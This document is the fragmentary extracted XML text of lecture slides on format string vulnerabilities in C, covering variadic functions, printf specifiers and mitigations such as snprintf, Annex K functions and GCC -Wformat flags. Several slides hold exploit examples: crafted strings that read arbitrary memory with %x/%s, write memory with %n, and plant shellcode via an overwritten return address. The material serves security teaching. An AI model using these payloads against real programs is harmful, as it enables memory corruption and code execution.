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2015)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4: Jan 26 – Jan 30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54635" y="-111360"/>
            <a:ext cx="106792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large memory addresses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24656" y="1019331"/>
            <a:ext cx="11317574" cy="5546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modify the contents of specific memory locations – e.g. return addresses.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used to write very large values (e.g. memory addresses).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char bar[4];            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char foo[4];                                         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memset(foo,0x0,4);                                  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memset(bar,’\x41’,4);			            00 00 00 00		41 41 41 41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printf(%16u%n”,1,(int *)&amp;foo[0]);                   10 00 00 00                    41 41 41 41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printf(%32u%n”,1,(int *)&amp;foo[1]);                   10 20 00 00 		00 41 41 41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printf(%64u%n”,1,(int *)&amp;foo[2]);                   10 20 40 00 		00 00 41 41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printf(%128u%n”,1,(int *)&amp;foo[3]);                 10 20 40 80 		00 00 00 41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263611" y="748176"/>
            <a:ext cx="5852511" cy="4860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static unsigned int already_written, width_field;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2. static unsigned int write_byte;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3. static char buffer[256];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4. already_written = 506;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// first byte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5. write_byte = 0x3C8;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6. already_written %= 0x100;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7. width_field = (write_byte - already_written) %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8. if (width_field &lt; 10) width_field +=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9. sprintf(buffer, "%%%du%%n", width_field);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 strcat(format, buffer);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// second byte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11. write_byte = 0x3fA;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12. already_written += width_field;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13. already_written %=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14. width_field = (write_byte - already_written) %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15. if (width_field &lt; 10) width_field += 0x100;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6598508" y="599893"/>
            <a:ext cx="5167183" cy="5570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16. sprintf(buffer, "%%%du%%n", width_field);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17. strcat(format, buffer);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third byte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18. write_byte = 0x442;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19. already_written += width_field;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20. already_written %=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21. width_field = (write_byte - already_written) %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22. if (width_field &lt; 10) width_field +=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23. sprintf(buffer, "%%%du%%n", width_field);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24. strcat(format, buffer);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// fourth byte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25. write_byte = 0x501;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26. already_written += width_field;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27. already_written %= 0x100;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28. width_field = (write_byte - already_written) %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29. if (width_field &lt; 10) width_field += 0x100;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30. sprintf(buffer, "%%%du%%n", width_field);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31. strcat(format, buffer);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-1524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21684" y="-337021"/>
            <a:ext cx="106792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large memory addresses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19991" y="-93518"/>
            <a:ext cx="10515600" cy="1049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Mitigation Strategies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07817" y="1049310"/>
            <a:ext cx="11617037" cy="5808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Visual Studio – disable %n but only allow through a certain function (set_printf_count_output).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validation.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Saf(er) buffer write function like snprintf(), vsnprintf() instead of sprint() and vsprintf().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Linux DHCP vulnerability from using vsnprintf()</a:t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#define vsnprintf(buf,siz,fmt,list) \ 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vsprintf(buf,fmt,list)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C11 Annex K Bounds-Checking Interfaces: printf_s(), sprintf_s(), snprintf_s(), vsprintf_s() etc. – runtime constraint checking e.g. if %n is present, if any argument corresponding to a %s is a null pointer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checks – GCC flags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Wformat: GCC checks at compile time verifies that the correct number of arguments and types are supplied.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Wformat-nonliteral: Adds warnings if the format string cannot be verified (e.g. not a string literal).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en-US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Wformat-security: Same as –Wformat but checks for security vulnerabilities.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Taint Analysis: Untrusted input qualified as ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="196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tainted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’. If used as a format string then the user is warned.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 shield: Randomly increases the stack pointer without mapping in the skippd bytes.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FormatGuard: Similar to –Wformat flags but works at preprocessing time.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Binary Analysis: Disassembling binaries and checking for possible string addresses to see if they are literals or variables. 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-2998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Lecture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65018" y="779318"/>
            <a:ext cx="10688782" cy="53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stack smashing attack.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shellcode for x86 64 architecture.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Injecting shellcode to a program as input.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the return address of the function to point to the buffer containing the shellcode.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84571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Formatted String Output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05245" y="904009"/>
            <a:ext cx="10948555" cy="5839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argument functions &lt;varargs.h&gt;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function involving ellipsis (variable arugements) – e.g. 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va_* macros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func(int x, . . .) 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…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va_list marker;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va_start (marker, x); //location of the last fixed argument.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loop_begin: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….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 = va_arg(marker, int);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loop_end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71944" y="1"/>
            <a:ext cx="10681855" cy="955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 Formatted Output Functions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58536" y="955965"/>
            <a:ext cx="10595264" cy="52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printf() and its siblings.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format strings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%[flags][width][.precision][{length-modifier}] conversion-specifier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Flags: justification, padding with 0s instead of blanks, # (prefixes e.g. 0x prefix before non-zero values etc.)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Width: padding width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Arguments after decimal points.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modifier: l – long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h – short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ll – long long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0"/>
            <a:ext cx="10515600" cy="9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Exploiting Formatted String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42260" y="925032"/>
            <a:ext cx="10811540" cy="5560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buffer overflow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output[512];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sprintf(buffer, “Printing:%s\n”,user_string);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output[512];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buffer[512];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sprintf(buffer, “input:%.400s”,user_string);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sprintf(output,buffer);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user_input: %500d\x3c\xd3\xff\xbf&lt;nops&gt;&lt;shellcode&gt;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71499" y="-112857"/>
            <a:ext cx="10512137" cy="1048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Through the Stack Indefinately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71499" y="1070264"/>
            <a:ext cx="10782301" cy="51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printf(“%s%s%s%s%s%s%s%s%s”);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format_str:”%08x %08x %08x %08x”)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printf(format_str,1,2,3);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string forces reads from the stack and forces each input from the stack to be interpreted as an “integer”.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conversion modifiers can be used to move through the stack accordingly – e.g. d,i,o,u,x increments the variable argument pointer by 4 bytes.  ll would cause the pointer to be incremented by 8 bytes.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51164" y="-299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Memory Contents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37755" y="1025670"/>
            <a:ext cx="10616045" cy="5151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string itself stored on the stack.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using %x argument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it to print the contents of any memory location.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printf(“%x%x%x%x%s”)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-Advances the variable arg. pointer up the stack to reach the memory location to be printed.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51164" y="-2998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Memory Contents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37755" y="1025670"/>
            <a:ext cx="10616045" cy="5151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contents at 0x08480110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endian format: \x10\x01\x48\x08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buffer[]:“\x10\x01\x48\x08%x%x%x%x%s”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printf(buffer)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-Advances the variable arg. pointer up the stack to reach the memory location containing \x10\x01\x48\x08. Thereafter it prints the contents of the string starting at that loc.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-Needs the address to be correctly aligned.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Memory Contents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19528" y="1325563"/>
            <a:ext cx="10634272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the exploit used to print arbitrary memory locations.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%n conversion specifier to modify arbitrary memory location.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printf(“Hello world!\n%n”,(int *)&amp;i);  /* write number of bytes written to stdout to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838200" y="5041962"/>
            <a:ext cx="65116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buffer[]:“\x10\x01\x48\x08%x%x%x%x%n”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printf(buffer)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